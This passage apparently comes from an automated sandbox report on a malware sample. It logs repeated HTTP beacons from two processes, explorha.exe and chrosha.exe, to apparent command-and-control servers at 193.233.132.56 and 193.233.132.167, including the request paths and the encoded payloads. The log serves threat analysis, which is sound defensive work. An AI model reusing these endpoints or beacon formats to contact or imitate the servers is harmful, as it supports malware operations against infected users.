                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:16.635970116 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:16.636969090 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:16.892774105 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.5 | 49920 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:16.868186951 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:17.114401102 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.5 | 49921 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:17.261063099 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:17.510898113 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:17.511830091 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:17.765737057 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.5 | 49922 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:17.365765095 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:17.616955996 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      96 | 192.168.2.5 | 49927 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:17.972577095 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.216613054 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      97 | 192.168.2.5 | 49928 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.131050110 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.377362013 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.382152081 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.632913113 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      98 | 192.168.2.5 | 49930 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.462346077 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.706995010 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      99 | 192.168.2.5 | 49931 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.992307901 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:19.237154007 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:19.239578009 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:19.492469072 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      100 | 192.168.2.5 | 49932 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:19.071513891 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:19.320133924 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.5 | 49933 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:19.573605061 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:19.824693918 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.5 | 49934 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:19.846642971 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:20.090818882 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:20.091675997 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:20.341702938 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.5 | 49935 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:20.204092979 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:20.455960035 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.5 | 49936 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:20.694490910 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:20.943108082 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:20.949634075 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
